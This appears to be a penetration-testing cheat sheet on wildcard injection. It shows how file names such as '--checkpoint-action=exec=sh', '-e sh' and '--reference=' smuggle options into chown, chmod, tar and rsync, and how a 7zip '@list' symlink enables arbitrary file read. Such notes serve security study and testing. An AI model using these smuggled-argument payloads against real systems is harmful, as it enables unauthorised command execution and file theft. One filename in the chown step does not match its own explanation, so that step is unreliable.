Wildcard Exploits

Chown & Chmod - Modify execution

Case

chown -R nobody:nobody folder/*.ext
chmod -R 620 folder/*.ext

Exploitation:

1. Navigate to the folder

2. Create a file called drf.ext

3. Create a file called --reference=.drf.php

4. When the script is executed it will read the filename specified at point 3 as a parameter and override the owner or permissions specified in the script with the one of the file pointed by the instruction (in this case drf.ext)

Tar - Arbitray command execution

Case

tar cvf archive.tar *

Exploitation:

1. Navigate to the folder

2. Create a file called --checkpoint=1

3. Create a file called --checkpoint-action=exec=sh <cmd or script>

4. On execution the command specified will be executed. Keep in mind that path separators are forbidden in filenames, as such your script should be in the same folder of the files created previously or in a path defined in your env variables

Rsync - Arbitrary command execution

Case

rsync -t *.ext

Exploitation:

1. Navigate to the target folder

2. Create a shell script called shell.ext (use shell.sh if the wildcard has no extension specified). Insert in the script any command you wish to execute

3. Create a new file called -e sh <shell file>

4. On execution the script created at point 2 is run

7zip - Arbitrary file read

Case (works regardless of the -- operator)

7za a file.zip -t7z -snl -- folder/*.ext

Exploitation:

1. Navigate to the target folder

2. Create a file called @list.txt

3. ln -s <target file> list.txt

4. Once the command runs the file pointed by the link list.txt will be included in the archive allowing us to read it